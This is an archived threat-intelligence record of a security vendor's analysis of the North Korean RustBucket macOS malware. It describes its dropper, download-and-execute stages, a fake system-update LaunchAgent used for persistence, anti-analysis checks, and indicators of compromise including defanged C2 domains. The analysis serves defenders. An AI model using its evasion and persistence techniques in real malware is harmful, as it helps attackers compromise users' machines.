{ "id": "411897d0-3a1d-47e0-9ba1-4ef9f6a1af69", "created_at": "2026-04-06T00:12:18.055651Z", "updated_at": "2026-04-10T03:35:51.270526Z", "deleted_at": null, "sha1_hash": "be5f16a4a1558170bdd5877bfc221097ec6d1fe6", "title": "BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6973286, "plain_text": "BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade\r\nAnalysis and Detection\r\nBy Phil Stokes\r\nPublished: 2023-07-05 · Archived: 2026-04-05 21:23:31 UTC\r\nBack in April, researchers at JAMF detailed a sophisticated APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on\r\ninfected devices. ‘RustBucket’, as they labeled it, was attributed with strong confidence to the BlueNoroff APT,\r\ngenerally assumed to be a subsidiary of the wider DPRK cyber attack group known as Lazarus.\r\nIn May, ESET tweeted details of a second RustBucket variant targeting macOS users, followed in June by\r\nElastic’s discovery of a third variant that included previously unseen persistence capabilities.\r\nRustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages\r\nof the malware. In this post, we review the multiple malware payloads used in the campaign and highlight the\r\nnovel techniques RustBucket deploys to evade analysis and detection.\r\nRustBucket Stage 1 | AppleScript Dropper\r\nThe attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled\r\nAppleScript that is saved in a .app format. Unlike regular macOS applications, Applets typically lack a user\r\ninterface and function merely as a convenient way for developers to distribute AppleScripts to users.\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 1 of 11\n\nThe threat actors chose not to save the script as run-only, which allows us to easily decompile the script with the\r\nbuilt-on osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when\r\nviewing compiled scripts).\r\nStage 1 executes three ‘do shell script’ commands to set up Stage 2\r\nThe script contains three do shell script commands, which serve to download and execute the next stage. In the\r\nvariant described by JAMF, this was a barebones PDF viewer called  Internal PDF Viewer . We will forgo the\r\ndetails here as researchers have previously described this in detail.\r\nStage 1 writes the second stage to the /Users/Shared/ folder, which does not require permissions and is\r\naccessible to malware without having to circumvent TCC. The Stage 1 variant described by Elastic differs in that\r\nit writes the second stage as a hidden file to /Users/Shared/.pd .\r\nThe Stage 1 is easily the least sophisticated and easily detected part of the attack chain. The arguments of the do\r\nshell script commands should appear in the Mac’s unified logs and as output from command line tools such as\r\nthe ps utility.\r\nSuccess of the Stage 1 relies heavily on how well the threat actor employs social engineering tactics. In the case\r\ndescribed by JAMF, the threat actors used an elaborate ruse of requiring an “internal” PDF reader to read a\r\nsupposedly confidential or ‘protected’ document. Victims were required to execute the Stage 1 believing it to be\r\ncapable of reading the PDF they had received. In fact, the Stage 1 was only a dropper, designed to protect the\r\nStage 2 should anyone without the malicious PDF stumble on it.\r\nRustBucket Stage 2 | Payloads Written in Swift and Objective-C\r\nWe have found a number of different Stage 2 payloads, some written in Swift, some in Objective-C, and both\r\ncompiled for Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of\r\nthe Stage 2 samples vary. The universal ‘fat’ binaries vary between 160Kb and 210Kb.\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 2 of 11\n\nSamples of RustBucket Stage 2 vary in size\r\nAcross the samples, various username strings can be found. Those we have observed in Stage 2 binaries so far\r\ninclude:\r\n/Users/carey/\r\n/Users/eric/\r\n/Users/henrypatel/\r\n/Users/hero/\r\nDespite the differences in size and code artifacts, the Stage 2 payloads have in common the task of retrieving the\r\nStage 3 from the command and control server. The Stage 2 payload requires a specially-crafted PDF to unlock the\r\ncode which would lead to the downloading of the Stage 3 and provide an XOR’d key to decode the obfuscated C2\r\nappended to the end of the PDF.\r\nIn some variants, this data is executed in the downAndExecute function as described by previous researchers; in\r\nothers, we note that download of the next stage is performed in the aptly-named down_update_run function. This\r\nfunction itself varies across samples. In b02922869e86ad06ff6380e8ec0be8db38f5002b , for example, it runs a\r\nhardcoded command via system() .\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 3 of 11\n\nStage 2 executes a shell command via the system() call to retrieve and run Stage 3\r\nHowever, the same function in other samples, (e.g., d5971e8a3e8577dbb6f5a9aad248c842a33e7a26 ) use NSURL\r\nAPIs and entirely different logic.\r\nCode varies widely among samples, possibly suggesting different developers\r\nResearchers at Elastic noted, further, that in one newer variant of Stage 2 written in Swift, the User-Agent string is\r\nall lowercase, whereas in the earlier Objective-C samples they are not.\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 4 of 11\n\nUser-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2\r\nAlthough User-Agent strings are not inherently case sensitive, if this was a deliberate change it is possible the\r\nthreat actors are parsing the User-Agent strings on the server side to weed out unwanted calls to the C2. That said,\r\nsloppiness around case-sensitivity is seen elsewhere in RustBucket samples (e.g., “/users/shared” in Stage 1), and\r\nthe case variance may be no more than a product of different developers with different standards of rigor.\r\nIn the most recent samples, the payload retrieved by Stage 2 is written to disk as“ErrorCheck.zip” in\r\n_CS_DARWIN_USER_TEMP (aka $TMPDIR typically at /var/folders/…/../T/ ) before being executed on the\r\nvictim’s device.\r\nRustBucket Stage 3 | New Variant Drops Persistence LaunchAgent\r\nThe Stage 3 payload has so far been seen in two distinct variants:\r\nA: 182760cbe11fa0316abfb8b7b00b63f83159f5aa Stage3\r\nB: b74702c9b82f23ebf76805f1853bc72236bee57c ErrorCheck, System Update\r\nBoth variants are Mach-O universal binaries compiled from Rust source code. Variant A is considerably larger\r\nthan B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The\r\nslimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both.\r\nNotably, variant B does away with the webT class seen in variant A for gathering environmental information and\r\nchecking for execution in a virtual machine via querying the SPHardwareDataType value of system_profiler .\r\nThe webT class appears in variant A of the Stage 3 payload\r\nHowever, variant B has not scrubbed all webT artifacts from the code and reference to the missing module can\r\nstill be found in the strings.\r\n18070 0x0032bdf4 0x10032bdf4 136 137 \r\nascii /Users/carey/Dev/MAC_DATA/MAC/Trojan/webT/target/x86_64-apple-darwin/release/deps/updator-7a0\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 5 of 11\n\nA string referencing the missing webT module can still be found in Stage 3 variant B\r\nThe substring “Trojan”, which does not appear in earlier variants, is also found in the file path referenced by the\r\nsame string.\r\nImportantly, variant B contains a persistence mechanism that was not present in the earlier versions of\r\nRustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at\r\n~/Library/LaunchAgents/com.apple.systemupdate.plist . The ErrorCheck file also writes a copy of itself to\r\n~/Library/Metadata/System Update  and serves as the target executable of the LaunchAgent.\r\nSince the Stage 3 requires a URL as a launch parameter this is provided in the property list as a Program\r\nArgument. Curiously, the URL passed to ErrorCheck on launch is appended to this hardcoded URL in the\r\nLaunchAgent plist.\r\nRustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 6 of 11\n\nAppending the supplied \u003curl\u003e value to the hardcoded URL can be clearly seen in the code, though whether this\r\nis an error or accounted for in the way the string is parsed by the binary we have yet to determine.\r\nMuch of the malware functionality found in variant A’s webT methods is, in variant B, now buried in the massive\r\nsym.updator::main function. This is responsible for surveilling the environment and parsing the arguments\r\nreceived at launch, processing commands, gathering disk information and more. This massive function is over\r\n22Kb and contains 501 basic blocks. Our analysis of this is ongoing but aside from the functions previously\r\ndescribed by Elastic, this function also gathers disk information, including whether the host device’s disk is SSD\r\nor the older, rotational platter type.\r\nAmong updator::main’s many tasks is gathering disk information\r\nAfter gathering environmental information, the malware calls sym.updator::send_request to post the data to the\r\nC2 using the following User-Agent string (this time not in lowercase):\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\nThe malware compares the response against two hardcoded values, 0x31 and 0x30 .\r\nChecking the values of the response from the C2\r\nIn the sample analyzed by Elastic, the researchers reported that 0x31 causes the malware to self-terminate while\r\n0x30 allows the operator to drop a further payload in the  _CS_DARWIN_USER_TEMP directory.\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 7 of 11\n\nThe choice of Rust and the complexity of the Stage 3 binaries suggest the threat actor was willing to invest\r\nconsiderable effort to thwart analysis of the payload. As the known C2s were unresponsive by the time we\r\nconducted our analysis, we were unable to obtain a sample of the next stage of the malware, but already at this\r\npoint in the operation the malware has gathered a great deal of host information, enabled persistence and opened\r\nup a backdoor for further malicious activity.\r\nSentinelOne Protects Against RustBucket Malware\r\nSentinelOne Singularity protects customers from known components of the RustBucket malware. Attempts to\r\ninstall persistence mechanisms on macOS devices are also dynamically detected and blocked by the agent.\r\nSentinelOne Agent User Interface\r\nSentinelOne Singularity Console\r\nConclusion\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 8 of 11\n\nThe RustBucket campaign highlights that the threat actor, whom previous researchers have confidently attributed\r\nto DPRK’s BlueNoroff APT, has invested considerable resources in multi-stage malware aimed specifically at\r\nmacOS users and is evolving its attempts to thwart analysis by security researchers.\r\nThe extensive effort made to evade analysis and detection in itself shows the threat actor is aware of the growing\r\nadoption of security software by organizations with macOS devices in their fleets, as security teams have\r\nincreasingly begun to see the need for better protection than provided out-of-the-box. SentinelOne continues to\r\ntrack the RustBucket campaign and our analysis of the known payloads is ongoing.\r\nTo see how SentinelOne can help safeguard your organization’s macOS devices, contact us for more information\r\nor request a free demo.\r\nIndicators of Compromise\r\nStage 2 Mach-Os\r\nSHA1 Arch Lang\r\n0df7e1d3b3d54336d986574441778c827ff84bf2 FAT objc\r\n27b101707b958139c32388eb4fd79fcd133ed880 ARM objc\r\n338af1d91b846f2238d5a518f951050f90693488 ARM objc\r\n5304031dc990790a26184b05b3019b2c5fa7022a FAT swift\r\n72167ec09d62cdfb04698c3f96a6131dceb24a9c ARM objc\r\n7f9694b46227a8ebc67745e533bc0c5f38fdfa59 ARM objc\r\n963a86aab1e450b03d51628797572fe9da8410a2 FAT objc\r\n9676f0758c8e8d0e0d203c75b922bcd0aeaa0873 FAT objc\r\na7f5bf893efa3f6b489efe24195c05ff87585fe3 ARM swift\r\nac08406818bbf4fe24ea04bfd72f747c89174bdb x86 objc\r\nacf1b5b47789badb519ff60dc93afa9e43bbb376 x86 swift\r\nb02922869e86ad06ff6380e8ec0be8db38f5002b x86 objc\r\nd5971e8a3e8577dbb6f5a9aad248c842a33e7a26 x86 objc\r\ne0e42ac374443500c236721341612865cd3d1eec FAT objc\r\ne275deb68cdff336cb4175819a09dbaf0e1b68f6 FAT swift\r\ned4f16b36bc47a701814b63e30d8ea7a226ca906 FAT swift\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 9 of 11\n\nfd1cef5abe3e0c275671916a1f3a566f13489416 x86 objc\r\nStage 3 Version A Mach-Os\r\nSHA1 Arch Lang\r\n182760cbe11fa0316abfb8b7b00b63f83159f5aa FAT rust\r\n3cc19cef767dee93588525c74fe9c1f1bf6f8007 ARM rust\r\n831dc7bc4a234907d94a889bcb60b7bedf1a1e13 x86 rust\r\n8e7b4a0d9a73ec891edf5b2839602ccab4af5bdf x86 rust\r\nStage 3 Version B Mach-Os\r\nSHA1 Arch Lang\r\n14165777bc48b49eb1fa9ad8fe3cb553565c26c2 FAT rust\r\n69f24956fb75beb9b93ef974d873914500e35601 ARM rust\r\n8a1b32ab8c2a889985e530425ae00f4428c575cc FAT rust\r\n8f7da0348001461fc5a1da99b89c571050de0aff x86 rust\r\na973d201c23b68c5d25ba8447b04f090c20bf6d4 ARM rust\r\nb74702c9b82f23ebf76805f1853bc72236bee57c FAT rust\r\ncd8f41b91e8f1d8625e076f0a161e46e32c62bbf x86 rust\r\nMalicious PDFs\r\nSHA1 Name\r\n469236d0054a270e117a2621f70f2a494e7fb823 DOJ Report on Bizlato Investigation.pdf\r\n574bbb76ef147b95dfdf11069aaaa90df968e542 Readme.pdf\r\n7e69cb4f9c37fad13de85e91b5a05a816d14f490 InvestmentStrategy(Protected).pdf\r\n7f8f43326f1ce505a8cd9f469a2ded81fa5c81be Jump Crypto Investment Agreement.pdf\r\nbe234cb6819039d6a1d3b1a205b9f74b6935bbcc DOJ Report on Bizlato Investigation_asistant.pdf\r\ne7158bb75adf27262ec3b0f2ca73c802a6222379 Daiwa Ventures.pdf\r\nStage 1 Applications (.zip)\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 10 of 11\n\n0738687206a88ecbee176e05e0518effa4ca4166\r\n0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be\r\n5933f1a20117d48985b60b10b5e42416ac00e018\r\n7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa\r\n7e1870a5b24c78a5e357568969aae3a5e7ab857d\r\n89301dfdc5361f1650796fecdac30b7d86c65122\r\n9121509d674091ce1f5f30e9a372b5dcf9bcd257\r\n9a5f6a641cc170435f52c6a759709a62ad5757c7\r\na1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0\r\nca59874172660e6180af2815c3a42c85169aa0b2\r\nd9f1392fb7ed010a0ecc4f819782c179efde9687\r\ne2bcdfbda85c55a4d6070c18723ba4adb7631807\r\nAppleScript main.scpt\r\ndabb4372050264f389b8adcf239366860662ac52\r\nCommunications\r\ncloud[.]dnx.capital\r\ncrypto.hondchain[.]com.\r\nFile Paths\r\n$TMPDIR/ErrorCheck.zip\r\n/Users/Shared/1.zip\r\n/Users/Shared/Internal PDF Viewer.app\r\n/Users/Shared/.pd\r\n~/Library/Metadata/System Update\r\n~/Library/LaunchAgents/com.apple.systemupdate.plist\r\nSource: https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nhttps://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/" ], "report_names": [ "bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection" ], "threat_actors": [ { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "cfdd35af-bd12-4c03-8737-08fca638346d", "created_at": "2022-10-25T16:07:24.165595Z", "updated_at": "2026-04-10T02:00:04.887031Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Cosmic Wolf", "Marbled Dust", "Silicon", "Teal Kurma", "UNC1326" ], "source_name": "ETDA:Sea Turtle", "tools": [ "Drupalgeddon" ], "source_id": "ETDA", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "33ae2a40-02cd-4dba-8461-d0a50e75578b", "created_at": "2023-01-06T13:46:38.947314Z", "updated_at": "2026-04-10T02:00:03.155091Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "UNC1326", "COSMIC WOLF", "Marbled Dust", "SILICON", "Teal Kurma" ], "source_name": "MISPGALAXY:Sea Turtle", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "62b1b01f-168d-42db-afa1-29d794abc25f", "created_at": "2025-04-23T02:00:55.22426Z", "updated_at": "2026-04-10T02:00:05.358041Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Sea Turtle", "Teal Kurma", "Marbled Dust", "Cosmic Wolf", "SILICON" ], "source_name": "MITRE:Sea Turtle", "tools": [ "SnappyTCP" ], "source_id": "MITRE", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434338, "ts_updated_at": 1775792151, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/be5f16a4a1558170bdd5877bfc221097ec6d1fe6.pdf", "text": "https://archive.orkl.eu/be5f16a4a1558170bdd5877bfc221097ec6d1fe6.txt", "img": "https://archive.orkl.eu/be5f16a4a1558170bdd5877bfc221097ec6d1fe6.jpg" } }